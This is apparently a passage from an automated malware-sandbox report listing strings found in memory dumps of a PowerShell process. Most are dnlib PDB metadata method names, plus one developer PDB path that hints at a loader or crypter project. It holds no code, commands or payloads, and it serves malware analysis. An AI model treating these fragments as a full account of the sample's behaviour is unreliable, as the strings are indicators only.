        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumTypeRefs source: powershell.exe, 00000004.00000002.2223028168.000001C26CCC0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2198404979.000001C21006E000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetParent source: powershell.exe, 00000004.00000002.2223028168.000001C26CCC0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2198404979.000001C21006E000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.ApplyEditAndContinue source: powershell.exe, 00000004.00000002.2223028168.000001C26CCC0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2198404979.000001C21006E000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: System.Collections.Generic.IEnumerator<dnlib.DotNet.Pdb.PdbScope>.Current source: powershell.exe, 00000004.00000002.2223028168.000001C26CCC0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2198404979.000001C21006E000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineModuleRef source: powershell.exe, 00000004.00000002.2223028168.000001C26CCC0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2198404979.000001C21006E000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetNameFromToken source: powershell.exe, 00000004.00000002.2223028168.000001C26CCC0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2198404979.000001C21006E000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeleteFieldMarshal source: powershell.exe, 00000004.00000002.2223028168.000001C26CCC0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2198404979.000001C21006E000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindField source: powershell.exe, 00000004.00000002.2223028168.000001C26CCC0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2198404979.000001C21006E000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMembers source: powershell.exe, 00000004.00000002.2223028168.000001C26CCC0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2198404979.000001C21006E000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeleteClassLayout source: powershell.exe, 00000004.00000002.2223028168.000001C26CCC0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2198404979.000001C21006E000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.IsValidToken source: powershell.exe, 00000004.00000002.2223028168.000001C26CCC0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2198404979.000001C21006E000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.Merge source: powershell.exe, 00000004.00000002.2223028168.000001C26CCC0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2198404979.000001C21006E000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindMemberRef source: powershell.exe, 00000004.00000002.2223028168.000001C26CCC0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2198404979.000001C21006E000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: D:\New Private Panell Src 3.0\Rump Updated FIX C#\src\obj\Debug\dnlib.pdbX source: powershell.exe, 00000004.00000002.2223028168.000001C26CCC0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2198404979.000001C21006E000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetParamProps source: powershell.exe, 00000004.00000002.2223028168.000001C26CCC0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2198404979.000001C21006E000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetParamProps source: powershell.exe, 00000004.00000002.2223028168.000001C26CCC0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2198404979.000001C21006E000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.GetSaveSize source: powershell.exe, 00000004.00000002.2223028168.000001C26CCC0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2198404979.000001C21006E000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindTypeRef source: powershell.exe, 00000004.00000002.2223028168.000001C26CCC0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2198404979.000001C21006E000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.ResetEnum source: powershell.exe, 00000004.00000002.2223028168.000001C26CCC0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2198404979.000001C21006E000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumProperties source: powershell.exe, 00000004.00000002.2223028168.000001C26CCC0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2198404979.000001C21006E000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMethodProps source: powershell.exe, 00000004.00000002.2223028168.000001C26CCC0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2198404979.000001C21006E000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMembersWithName source: powershell.exe, 00000004.00000002.2223028168.000001C26CCC0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2198404979.000001C21006E000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetCustomAttributeValue source: powershell.exe, 00000004.00000002.2223028168.000001C26CCC0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2198404979.000001C21006E000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineCustomAttribute source: powershell.exe, 00000004.00000002.2223028168.000001C26CCC0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2198404979.000001C21006E000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethodImpls source: powershell.exe, 00000004.00000002.2223028168.000001C26CCC0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2198404979.000001C21006E000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineEvent source: powershell.exe, 00000004.00000002.2223028168.000001C26CCC0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2198404979.000001C21006E000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetCustomAttributeByName source: powershell.exe, 00000004.00000002.2223028168.000001C26CCC0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2198404979.000001C21006E000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineMethod source: powershell.exe, 00000004.00000002.2223028168.000001C26CCC0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2198404979.000001C21006E000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.TranslateSigWithScope source: powershell.exe, 00000004.00000002.2223028168.000001C26CCC0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2198404979.000001C21006E000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineUserString source: powershell.exe, 00000004.00000002.2223028168.000001C26CCC0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2198404979.000001C21006E000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.Save source: powershell.exe, 00000004.00000002.2223028168.000001C26CCC0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2198404979.000001C21006E000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetTypeSpecFromToken source: powershell.exe, 00000004.00000002.2223028168.000001C26CCC0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2198404979.000001C21006E000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetPermissionSetProps source: powershell.exe, 00000004.00000002.2223028168.000001C26CCC0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2198404979.000001C21006E000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetNativeCallConvFromSig source: powershell.exe, 00000004.00000002.2223028168.000001C26CCC0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2198404979.000001C21006E000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.CountEnum source: powershell.exe, 00000004.00000002.2223028168.000001C26CCC0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2198404979.000001C21006E000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethodSemantics source: powershell.exe, 00000004.00000002.2223028168.000001C26CCC0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2198404979.000001C21006E000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumFields source: powershell.exe, 00000004.00000002.2223028168.000001C26CCC0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2198404979.000001C21006E000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethods source: powershell.exe, 00000004.00000002.2223028168.000001C26CCC0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2198404979.000001C21006E000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000004.00000002.2221743469.000001C26C9C9000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetTypeRefProps source: powershell.exe, 00000004.00000002.2223028168.000001C26CCC0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2198404979.000001C21006E000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: mscorlib.pdb source: powershell.exe, 00000004.00000002.2214644675.000001C26A778000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetSigFromToken source: powershell.exe, 00000004.00000002.2223028168.000001C26CCC0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2198404979.000001C21006E000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumTypeSpecs source: powershell.exe, 00000004.00000002.2223028168.000001C26CCC0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2198404979.000001C21006E000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.CloseEnum source: powershell.exe, 00000004.00000002.2223028168.000001C26CCC0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2198404979.000001C21006E000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetModuleRefProps source: powershell.exe, 00000004.00000002.2223028168.000001C26CCC0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2198404979.000001C21006E000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SaveToMemory source: powershell.exe, 00000004.00000002.2223028168.000001C26CCC0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2198404979.000001C21006E000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineTypeRefByName source: powershell.exe, 00000004.00000002.2223028168.000001C26CCC0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2198404979.000001C21006E000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb source: powershell.exe, 00000004.00000002.2223028168.000001C26CCC0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2198404979.000001C21006E000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetScopeProps source: powershell.exe, 00000004.00000002.2223028168.000001C26CCC0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2198404979.000001C21006E000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindMember source: powershell.exe, 00000004.00000002.2223028168.000001C26CCC0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2198404979.000001C21006E000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetPropertyProps source: powershell.exe, 00000004.00000002.2223028168.000001C26CCC0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2198404979.000001C21006E000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumParams source: powershell.exe, 00000004.00000002.2223028168.000001C26CCC0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2198404979.000001C21006E000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.MergeEnd source: powershell.exe, 00000004.00000002.2223028168.000001C26CCC0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2198404979.000001C21006E000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss source: powershell.exe, 00000004.00000002.2223028168.000001C26CCC0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2198404979.000001C21006E000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetEventProps source: powershell.exe, 00000004.00000002.2223028168.000001C26CCC0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2198404979.000001C21006E000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumCustomAttributes source: powershell.exe, 00000004.00000002.2223028168.000001C26CCC0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2198404979.000001C21006E000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: mscorlib.pdbdbID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\InprocServer32 source: powershell.exe, 00000004.00000002.2221743469.000001C26C9C9000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetFieldProps source: powershell.exe, 00000004.00000002.2223028168.000001C26CCC0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2198404979.000001C21006E000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumModuleRefs source: powershell.exe, 00000004.00000002.2223028168.000001C26CCC0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2198404979.000001C21006E000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: System.Collections.Generic.IEnumerator<dnlib.DotNet.Pdb.PdbScope>.get_Current source: powershell.exe, 00000004.00000002.2223028168.000001C26CCC0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2198404979.000001C21006E000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetCustomAttributeProps source: powershell.exe, 00000004.00000002.2223028168.000001C26CCC0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2198404979.000001C21006E000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetFieldProps source: powershell.exe, 00000004.00000002.2223028168.000001C26CCC0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2198404979.000001C21006E000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineParam source: powershell.exe, 00000004.00000002.2223028168.000001C26CCC0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2198404979.000001C21006E000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeleteToken source: powershell.exe, 00000004.00000002.2223028168.000001C26CCC0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2198404979.000001C21006E000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetClassLayout source: powershell.exe, 00000004.00000002.2223028168.000001C26CCC0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2198404979.000001C21006E000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineNestedType source: powershell.exe, 00000004.00000002.2223028168.000001C26CCC0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2198404979.000001C21006E000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumUnresolvedMethods source: powershell.exe, 00000004.00000002.2223028168.000001C26CCC0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2198404979.000001C21006E000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumPermissionSets source: powershell.exe, 00000004.00000002.2223028168.000001C26CCC0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2198404979.000001C21006E000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Managed source: powershell.exe, 00000004.00000002.2223028168.000001C26CCC0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2198404979.000001C21006E000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: +dnlib.DotNet.Pdb.PdbWriter+<GetScopes>d__17 source: powershell.exe, 00000004.00000002.2223028168.000001C26CCC0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2198404979.000001C21006E000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetRVA source: powershell.exe, 00000004.00000002.2223028168.000001C26CCC0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2198404979.000001C21006E000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetModuleFromScope source: powershell.exe, 00000004.00000002.2223028168.000001C26CCC0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2198404979.000001C21006E000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineMethodImpl source: powershell.exe, 00000004.00000002.2223028168.000001C26CCC0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2198404979.000001C21006E000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefinePinvokeMap source: powershell.exe, 00000004.00000002.2223028168.000001C26CCC0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2198404979.000001C21006E000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineSecurityAttributeSet source: powershell.exe, 00000004.00000002.2223028168.000001C26CCC0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2198404979.000001C21006E000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetClassLayout source: powershell.exe, 00000004.00000002.2223028168.000001C26CCC0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2198404979.000001C21006E000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineMemberRef source: powershell.exe, 00000004.00000002.2223028168.000001C26CCC0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2198404979.000001C21006E000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetPermissionSetProps source: powershell.exe, 00000004.00000002.2223028168.000001C26CCC0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2198404979.000001C21006E000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetTypeDefProps source: powershell.exe, 00000004.00000002.2223028168.000001C26CCC0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2198404979.000001C21006E000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineProperty source: powershell.exe, 00000004.00000002.2223028168.000001C26CCC0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2198404979.000001C21006E000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetFieldRVA source: powershell.exe, 00000004.00000002.2223028168.000001C26CCC0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2198404979.000001C21006E000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindTypeDefByName source: powershell.exe, 00000004.00000002.2223028168.000001C26CCC0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2198404979.000001C21006E000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetModuleProps source: powershell.exe, 00000004.00000002.2223028168.000001C26CCC0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2198404979.000001C21006E000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumFieldsWithName source: powershell.exe, 00000004.00000002.2223028168.000001C26CCC0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2198404979.000001C21006E000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMemberRefs source: powershell.exe, 00000004.00000002.2223028168.000001C26CCC0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2198404979.000001C21006E000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.ResolveTypeRef source: powershell.exe, 00000004.00000002.2223028168.000001C26CCC0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2198404979.000001C21006E000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SaveToStream source: powershell.exe, 00000004.00000002.2223028168.000001C26CCC0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2198404979.000001C21006E000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMethodSemantics source: powershell.exe, 00000004.00000002.2223028168.000001C26CCC0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2198404979.000001C21006E000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetTypeDefProps source: powershell.exe, 00000004.00000002.2223028168.000001C26CCC0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2198404979.000001C21006E000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindMethod source: powershell.exe, 00000004.00000002.2223028168.000001C26CCC0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2198404979.000001C21006E000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetNestedClassProps source: powershell.exe, 00000004.00000002.2223028168.000001C26CCC0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2198404979.000001C21006E000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeletePinvokeMap source: powershell.exe, 00000004.00000002.2223028168.000001C26CCC0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2198404979.000001C21006E000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.GetTokenFromTypeSpec source: powershell.exe, 00000004.00000002.2223028168.000001C26CCC0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2198404979.000001C21006E000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetMethodImplFlags source: powershell.exe, 00000004.00000002.2223028168.000001C26CCC0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2198404979.000001C21006E000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetPinvokeMap source: powershell.exe, 00000004.00000002.2223028168.000001C26CCC0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2198404979.000001C21006E000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetPinvokeMap source: powershell.exe, 00000004.00000002.2223028168.000001C26CCC0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2198404979.000001C21006E000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumSignatures source: powershell.exe, 00000004.00000002.2223028168.000001C26CCC0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2198404979.000001C21006E000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetFieldMarshal source: powershell.exe, 00000004.00000002.2223028168.000001C26CCC0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2198404979.000001C21006E000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumUserStrings source: powershell.exe, 00000004.00000002.2223028168.000001C26CCC0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2198404979.000001C21006E000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetRVA source: powershell.exe, 00000004.00000002.2223028168.000001C26CCC0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2198404979.000001C21006E000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefinePermissionSet source: powershell.exe, 00000004.00000002.2223028168.000001C26CCC0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2198404979.000001C21006E000.00000004.00000800.00020000.00000000.sdmp
